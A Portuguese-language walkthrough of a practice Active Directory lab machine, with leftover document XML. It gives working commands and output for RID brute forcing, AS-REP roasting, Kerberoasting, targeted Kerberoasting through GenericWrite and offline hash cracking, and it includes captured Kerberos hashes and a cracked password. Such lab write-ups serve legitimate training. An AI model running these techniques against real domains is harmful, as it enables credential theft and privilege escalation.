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WCorp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máquina apresenta ataques de ASREPRoasting e Impersionation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Iniciaremos este projeto com a fase de reconhecimento, realizando a coleta de informações sobre o ambiente alvo. Realizaremos a enumeração de portas para identificar serviços ativos e expostos no ambiente alvo.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~/tools/enumport/script.sh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Enumerando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portas....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Portas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abertas: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53,88,135,139,389,445,593,636,3269,3389,5985,9389,49664,49668,49673,49674,49706,49713,49785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Verificando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7.94SVN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https://nmap.org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19:11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(0.14s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latency).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53/tcp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88/tcp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kerberos-sec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Kerberos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(server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22:11:26Z)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135/tcp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139/tcp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netbios-ssn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netbios-ssn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389/tcp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(Domain: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wcorp.hc0.,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Site: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Default-First-Site-Name)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|_ssl-date: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TLS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randomness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represent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ssl-cert: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DNS:dc-01.wcorp.hc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2025-04-16T06:57:57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2026-04-16T06:57:57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445/tcp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microsoft-ds?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593/tcp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ncacn_http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636/tcp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ssl/ldap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(Domain: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wcorp.hc0.,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Site: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Default-First-Site-Name)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ssl-cert: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DNS:dc-01.wcorp.hc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2025-04-16T06:57:57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2026-04-16T06:57:57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|_ssl-date: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TLS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randomness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represent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3269/tcp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ssl/ldap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(Domain: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wcorp.hc0.,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Site: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Default-First-Site-Name)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ssl-cert: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DNS:dc-01.wcorp.hc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2025-04-16T06:57:57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2026-04-16T06:57:57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|_ssl-date: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TLS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randomness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represent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3389/tcp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ms-wbt-server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Terminal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ssl-cert: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commonName=dc-01.wcorp.hc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before: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2025-04-15T06:30:33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after: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2025-10-15T06:30:33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|_ssl-date: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2025-04-19T22:12:55+00:00;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-18s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rdp-ntlm-info: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Target_Name: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NetBIOS_Domain_Name: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NetBIOS_Computer_Name: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DNS_Domain_Name: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DNS_Computer_Name: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DNS_Tree_Name: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Product_Version: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10.0.20348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System_Time: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2025-04-19T22:12:16+00:00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5985/tcp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HTTPAPI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(SSDP/UPnP)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|_http-server-header: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Microsoft-HTTPAPI/2.0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|_http-title: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9389/tcp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mc-nmf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.NET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49664/tcp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49668/tcp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49673/tcp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ncacn_http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49674/tcp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49706/tcp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49713/tcp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49785/tcp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msrpc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Microsoft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DC-01;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Windows;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CPE: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cpe:/o:microsoft:windows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smb2-time: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2025-04-19T22:12:19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start_date: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smb2-security-mode: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3:1:1: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signing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|_clock-skew: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mean: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-18s,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deviation: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0s,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median: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-18s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performed.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incorrect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https://nmap.org/submit/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done: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up)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110.29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enumeração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portas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serviços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utilizamos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personalizado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juntamente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18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap:</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono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https://github.com/fstringuetta/enumport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Para facilitar a resolução de nomes, adicionamos o domínio diretamente no arquivo hosts.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dc-01.wcorp.hc'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Considerando que o serviço SMB está ativo na aplicação, foi realizada uma tentativa de acesso a compartilhamentos públicos utilizando credenciais de convidado. O objetivo desta etapa é identificar eventuais permissões indevidas em recursos compartilhados que possam estar acessíveis sem autenticação ou com permissões mínimas.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20348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(name:DC-01)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(domain:wcorp.hc)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(signing:True)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(SMBv1:False)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wcorp.hc\guest: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Enumerated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IPC$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NETLOGON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SYSVOL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Identificamos que a conta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se habilitada e possui permissões de leitura nos compartilhamentos SMB, permitindo a listagem de diretórios disponíveis. Embora não tenham sido encontrados arquivos ou diretórios relevantes nesse contexto, essas permissões podem ser exploradas para realizar a enumeração de usuários do domínio através da técnica de RID Brute Forcing, utilizando o parâmetro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--rid-brute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> da ferramenta netexec.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25400" l="25400" r="25400" t="254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A execução do parâmetro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eb5757"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--rid-brute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permitiu a enumeração de usuários válidos no domínio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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A partir dos dados obtidos, foi possível compilar uma lista de contas para utilização em etapas posteriores de autenticação e exploração.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'guest'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--rid-brute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'SidTypeUser'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'\\'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krbtgt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john.doe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alice.hr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bob.finance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charlie.dev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diana.ops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Com base na lista de usuários enumerados, foram identificadas duas possíveis contas de serviço: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eb5757"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_backup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eb5757"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_web</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. De posse dessa informação, foi utilizado o script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eb5757"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GetNPUsers.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, pertencente ao pacote Impacket, com o objetivo de verificar a presença da configuração 'Do not require Kerberos preauthentication'. Caso habilitada, essa condição permite a extração de hashes Kerberos TGT (AS-REP), viabilizando ataques do tipo AS-REP Roasting.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GetNPUsers.py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wcorp.hc/guest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-no-pass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-usersfile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-outputfile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v0.13.0.dev0+20250320.94448.5a402fcb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Kerberos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KDC_ERR_CLIENT_REVOKED(Clients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john.doe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alice.hr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bob.finance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charlie.dev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diana.ops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$krb5asrep$23$svc_backup@WCORP.HC:d1c7e43b9d22ee883593a84c4c26a64a$9f641890d729f05e7357ea122ec66cd1d2720f366693a878f40bcf483ae058b1304d1bb4a41a43df1a74748563ff78d50f648b13e07b1c0d316791ae046dcac1d411cce3b31....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UF_DONT_REQUIRE_PREAUTH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8ikhsrcf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dos parâmetros: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wcorp.hc/guest</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: domínio e usuário usado para autenticar (nesse caso, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guest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-no-pass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: indica que será feito acesso </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sem senha</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (anônimo ou guest)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-dc-ip 172.16.11.181</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IP do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Controller</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> alvo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-usersfile users.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: arquivo com a lista de usuários a serem testados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-outputfile hashes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: salva os hashes Kerberos TGT obtidos no arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashes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a execução do script, foi possível recuperar o hash Kerberos do usuário svc_backup. Com isso, foi criado um arquivo contendo o hash extraído, o qual foi utilizado para a realização de um ataque de força bruta com o objetivo de identificar a senha em texto claro.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-w=/usr/share/wordlists/rockyou.txt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--format=krb5asrep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hashes-krb5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(krb5asrep,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Kerberos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AS-REP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17/18/23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[MD4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HMAC-MD5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PBKDF2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HMAC-SHA1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256/256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AVX2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8x])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Ctrl-C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($krb5asrep$23$svc_backup@WCORP.HC)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0:00:00:14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(2025-04-19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17:29)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0.07017g/s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764874p/s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764874c/s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764874C/s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Lxi911S..LuvForLav@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"--show"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Assim que efetuamos a quebra bem-sucedida do hash da conta de serviço, a credencial obtida pode ser validada utilizando a ferramenta netexec, confirmando seu uso para autenticação no ambiente.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De posse da credencial validada com sucesso, foi possível realizar a enumeração de todos os usuários cadastrados no Active Directory, utilizando a autenticação fornecida pela conta de serviço comprometida, tendo acesso a nossa primeira evidência.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'svc_backup'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'PASSWORD_HERE'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25400" l="25400" r="25400" t="254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A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Para dar continuidade ao ataque e obter acesso à última evidência, será necessário comprometer a conta Administrator. Como primeiro passo, foi realizada a execução do ingestor do BloodHound, com o objetivo de obter uma visão panorâmica da estrutura do domínio e identificar possíveis caminhos de escalonamento de privilégios.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bloodhound-python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'svc_backup'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'PASSWORD_HERE'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dc-01.wcorp.hc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TGT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enumeration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dc-01.wcorp.hc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20250419205634_bloodhound.zip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1f35o3z13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dos parâmetros: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-zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: compacta os arquivos de saída em um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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compatível com a interface do BloodHound.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-c All</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: coleta completa de dados do domínio (usuários, grupos, ACLs, sessões, trust relationships, etc.).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-d wcorp.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: nome do domínio alvo.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-u 'svc_backup'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: nome de usuário utilizado para autenticação.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-p 'LuvinJames&lt;3'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: senha da conta usada para autenticação.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-dc dc-01.wcorp.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: FQDN do Domain Controller a ser consultado.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-ns 172.16.11.181</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IP do servidor DNS (normalmente o próprio DC).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Assim que concluído a geração do arquivo compactado no formato </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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, o conteúdo foi importado na interface da aplicação BloodHound para análise da topologia do domínio e identificação de possíveis caminhos de escalonamento de privilégios.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25400" l="25400" r="25400" t="254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GetUserSPNs.py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wcorp.hc/svc_backup:'PASSWORD_HERE'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v0.13.0.dev0+20250320.94448.5a402fcb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ServicePrincipalName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PasswordLastSet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LastLogon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HTTP/app01.wcorp.hc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03:55:21.770126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18:20:46.842080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86211uknu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dos parâmetros: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wcorp.hc/svc_backup:'LuvinJames&lt;3'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: credenciais de autenticação, com o domínio </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wcorp.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, o usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_backup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e a senha </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'LuvinJames&lt;3'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dc-ip 172.16.11.181</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IP do Domain Controller (usado para evitar resolução DNS ou problemas de nome).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Assim que efetuado a execução do comando, foi possível identificar que a conta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_web</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> possui um SPN configurado. Com base nessa informação, foi realizada a requisição do hash Kerberos TGS associado ao SPN, possibilitando a execução de um ataque de Kerberoasting.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GetUserSPNs.py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wcorp.hc/svc_backup:'PASSWORD_HERE'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v0.13.0.dev0+20250320.94448.5a402fcb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ServicePrincipalName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MemberOf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PasswordLastSet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LastLogon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HTTP/app01.wcorp.hc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03:55:21.770126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2025-04-19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18:20:46.842080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CCache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Skipping...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krb5tgs$23$*svc_web$WCORP.HC$wcorp.hc/svc_web*$928e2188409c8fe6d3ef600530ab7ed9$ddb374b7a431707fe635d505e0f68498cc9649b6bb593a152aec88024c3b4926050ce9f0f1d918657c35ebe3bc47328cd84c6e8a09d114cfeab136fd26ad1cc7bc316ed8c9008085b459c0365eea925c9072bb2189fdf0bb22dce56cad165dedeef936493dbb73f2f878ae4df1e09f4313d41d476e8faffdfae361d328b57ed2b533e135906c13e4c9a3e46525c1233451653e6c3ad13b975afbe52cfb4b73d93d153342b453e432722492e086ff214503a3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d14ev505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dos parâmetros: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wcorp.hc/svc_backup:'PASSOWRD_HERE'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: credenciais de autenticação, com domínio (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wcorp.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), usuário (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_backup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) e senha.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dc-ip 172.16.11.181</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IP do Domain Controller que será consultado.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 além de listar os SPNs, também </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">requisita o TGS (Ticket Granting Service)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para os usuários encontrados, retornando o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash Kerberos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que pode ser usado em ataques de Kerberoasting.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o hash Kerberos obtido da conta de serviço </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_web</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, foi criado um arquivo contendo o valor capturado, o qual foi utilizado para a realização de um ataque de força bruta com o objetivo de recuperar a senha em texto claro.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-w=/usr/share/wordlists/rockyou.txt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hash-svc-web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--format=krb5tgs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(krb5tgs,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Kerberos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[MD4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HMAC-MD5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Ctrl-C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(?)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0:00:00:15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(2025-04-19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21:12)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0.06489g/s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718261p/s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718261c/s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718261C/s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J,milagros..IwonDarlaCarlo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"--show"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Após a obtenção de mais uma credencial válida, foi realizada uma nova análise no </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eb5757"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para verificar as permissões e relacionamentos atribuídos ao respectivo usuário dentro do domínio, com o objetivo de identificar possíveis caminhos para escalonamento de privilégios.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25400" l="25400" r="25400" t="254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Foi identificado que a conta comprometida possui a permissão </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GenericWrite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre o usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john.doe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Essa permissão permite a modificação de determinados atributos do objeto no Active Directory, o que pode ser explorado para obter o hash Kerberos do usuário.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE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permissão </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GenericWrite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite alterar diversos atributos de um objeto no Active Directory, como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">servicePrincipalName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userAccountControl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scriptPath</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, entre outros.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~/tools/targetedKerberoast/targetedKerberoast.py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'wcorp.hc'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'svc_web'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'PASSWORD_HERE'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kerberoast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[VERBOSE]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(john.doe)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(john.doe)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krb5tgs$23$*john.doe$WCORP.HC$wcorp.hc/john.doe*$939e53611c683c816214a9c0ad74eaf8$f1c85db1878f06e69660b879924782d94545b6a3207d0ad314a92290946d073d61e40546a017ead54741a52eb3f67d7f08e14ad09a6e5f10f5db913065679da3a30bb958936f12552334d7dda243c659c095cf41b170f192f00bde4bfadb42e7db3bbbff1c98ecd86d7c1adbc0aab9eca53262883c8ad2c9ea52c79187a7aa32f4634c234184090005c22a6ffea8822280453753a657f288e5d71128385041973c7c9bff1fe3c1e924556148f7692d4e7e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fg30luuv4a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Explicação dos parâmetros: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 : ativa o modo verboso, exibindo detalhes adicionais sobre a execução (ex: SPNs adicionados/removidos e hashes extraídos).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-d 'wcorp.hc'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: especifica o nome do domínio alvo.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-u 'svc_web'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: nome de usuário que possui permissões sobre o objeto alvo (ex: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GenericWrite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre outro usuário).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-p 'PASSWORD_HERE'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: senha do usuário fornecido em </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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 de referência: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https://github.com/ShutdownRepo/targetedKerberoast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Efetuado a execução do comando, foi possível obter o hash Kerberos do usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john.doe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Com isso, foi criado um novo arquivo contendo o hash extraído, que foi utilizado em um ataque de força bruta com o objetivo de recuperar a senha em texto claro.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-w=/opt/SecLists/Passwords/xato-net-10-million-passwords.txt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hash-john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--format=krb5tgs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(krb5tgs,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Kerberos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[MD4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HMAC-MD5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Ctrl-C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(?)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0:00:00:03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(2025-04-19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21:31)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0.3205g/s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1138Kp/s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1138Kc/s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1138KC/s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Wf46NuLv..WeiLu3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"--show"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Logo que efetuamos execução do ataque de força bruta sobre o hash do usuário, foi possível identificar sua senha em texto claro. Com a credencial válida em mãos, foi realizada uma nova análise no </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="eb5757"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para verificar as permissões e relacionamentos atribuídos a esse usuário no domínio.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25400" l="25400" r="25400" t="254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Foi identificado que o usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john.doe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> possui o privilégio </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ForceChangePassword</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre a conta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">diana.ops</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, permitindo a realização da troca de sua senha sem a necessidade da credencial atual.</w:t>
      </w:r>
    </w:p>
